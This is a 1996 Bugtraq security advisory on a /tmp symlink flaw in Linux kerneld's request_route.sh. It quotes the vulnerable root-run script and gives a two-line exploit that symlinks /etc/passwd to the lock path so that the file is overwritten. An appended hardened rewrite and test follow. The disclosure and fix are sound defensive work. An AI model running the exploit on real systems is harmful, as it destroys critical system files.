
List:       bugtraq
Subject:    [linux-security] Big security hole in kerneld's request_route
From:       "Igor Chudov  ()  home" <ichudov () algebra ! com>
Date:       1996-06-13 17:51:57

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

I was just looking at sources of newly released linux 2.0.
In modules-1.3.69k, in kerneld's subdirectory, there is a file
request_route.sh (see below). It's supposed to run as root, whenever
a route is requested. It is supposed to start pppd or something like
that.

As it appears, it is possible to destroy system philes (such as /etc/passwd
and so on).

Condition: you must have a system which has "on-demand loading" of pppd,
whenever a route is requested.

Exploit:

you$ ln -s /etc/passwd /tmp/request-route
you$ ping 204.251.80.30

Internally kerneld starts request_route, request_route writes pid
to the symlinked file, and the file pointed to by symlink is overwritten.

Did I miss something?

        - Igor.


#! /bin/sh
LOCK=/tmp/request-route
PATH=/usr/sbin:$PATH    # for ppp-2.2*
export PATH

# Note: you are _not_ forced to use ppp!
# You can do whatever you want in order to satisfy the kernel route request.
# It might be a good idea to set up the route as the default route, in case
# you are using e.g. slip or plip or any other net driver...

#
# This script will be called from kerneld with the requested route as $1
# Create a chat script for your nameserver (as defined in /etc/resolv.conf)
#

chatfile=/etc/ppp/chat.$1

if [ -f $chatfile ]
then
        #
        # Tune your favourite parameters to pppd, including the idle-disconnect option.
        # Kerneld will be automatically triggered to load slhc.o and ppp.o
        #
        pppd connect "chat -f $chatfile" /dev/modem 38400 \
             idle-disconnect 600 modem defaultroute noipdefault \
             &  # let pppd detach itself whenever it wants to...

        #
        # Timer to be killed by ip-up, tunable! Check kerneld delay as well
        #
        sleep 60 &
        sleepid=$!
        echo $sleepid > $LOCK
        wait $sleepid
        rm -f $LOCK
        exit 0
else
        exit 1
fi

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMb+XDMJFmFyXKPzRAQHLzwP9HAD/WCkirGpBUjLXIdcmhQcQMf3eJMDk
Y5tU/7KkXR2afOmEncZEQs57FOhHaVtDiAMZ0B25Dn0ef6qhbYSS3wjzjh2V8m0d
OHxnoRHTSApM1mQA2WFPYkzfqmFHXzQBHur6xNkl6JcJ9FiLFSQp3cQBjgcafX0C
CaDXkJNTNSI=
=8zfD
-----END PGP SIGNATURE-----
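The weakness Igor points at is the `echo $sleepid > $LOCK` line: the lock path is predictable, lives in a world-writable directory, and `>` follows whatever symlink an unprivileged user has planted there, so a root-run script truncates a file of the attacker's choosing. The script below is an added example, not part of the original post and not the modules package's request_route.sh; it shows the lock handling a defender would substitute. It assumes a root-owned lock directory (`/var/run/request-route` is an assumed location, overridable through `LOCKDIR`), and the function names `take_lock`, `release_lock`, `lock_holder`, `check_symlink_rejected` and `request_route_hardened` are this example's own. `mkdir` is used for the lock because mkdir(2) is atomic and fails with EEXIST when anything, a symlink included, already sits at the path, so the pid is only ever written into a directory the script created itself.

```shell
#!/bin/sh
# Added example, not the kerneld project's request_route.sh.
# Lock handling that cannot be redirected through a planted symlink.

# take_lock LOCKDIR PID -> 0 on success, 1 if anything already exists at LOCKDIR
take_lock() {
    lockdir=$1
    pid=$2
    # mkdir never follows a symbolic link at the target path: a planted
    # LOCKDIR -> /etc/passwd makes it fail instead of truncating the target.
    mkdir "$lockdir" 2>/dev/null || return 1
    # The directory is ours now, so the pid file inside it is known to be fresh.
    printf '%s\n' "$pid" > "$lockdir/pid"
}

# release_lock LOCKDIR
release_lock() {
    rm -f "$1/pid"
    rmdir "$1"
}

# lock_holder LOCKDIR -> prints the recorded pid (exit 1 if no lock is held)
lock_holder() {
    [ -f "$1/pid" ] && cat "$1/pid"
}

# check_symlink_rejected VICTIM LOCKPATH
# Constructed check: plant a symlink at LOCKPATH pointing at VICTIM, attempt to
# take the lock, and verify VICTIM's contents survive. Returns 0 only when the
# lock was refused and the victim is untouched.
check_symlink_rejected() {
    victim=$1
    lockpath=$2
    before=$(cat "$victim")
    ln -s "$victim" "$lockpath"
    if take_lock "$lockpath" 4242; then
        # Should never happen: the lock was acquired through a symlink.
        rm -rf "$lockpath"
        return 1
    fi
    after=$(cat "$victim")
    rm -f "$lockpath"
    [ "$before" = "$after" ]
}

# request_route_hardened ROUTE
# The original flow (timer whose pid is recorded, killed by ip-up) with the
# hardened lock. The pppd invocation is left as a comment; this example does
# not dial out. ROUTE_WAIT replaces the fixed "sleep 60" so the flow can be
# exercised quickly (assumed variable, default 60 like the original).
request_route_hardened() {
    lockdir=${LOCKDIR:-/var/run/request-route}   # assumed, root-owned location
    # pppd connect "chat -f /etc/ppp/chat.$1" /dev/modem 38400 \
    #      idle-disconnect 600 modem defaultroute noipdefault &
    sleep "${ROUTE_WAIT:-60}" &
    sleepid=$!
    if ! take_lock "$lockdir" "$sleepid"; then
        # Another request is in flight, or something is squatting on the path:
        # refuse rather than overwrite.
        kill "$sleepid" 2>/dev/null
        return 1
    fi
    wait "$sleepid"
    release_lock "$lockdir"
}
```

Moving the lock out of `/tmp` removes the attacker's ability to pre-create the path at all; the mkdir-based lock is the second line of defence for the case where the directory is shared anyway. A shell that supports `set -C` (noclobber) gets similar protection for plain `>` redirections, because the open is then done with O_EXCL and fails on a symlink, but that relies on shell behaviour rather than on a documented system call guarantee.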
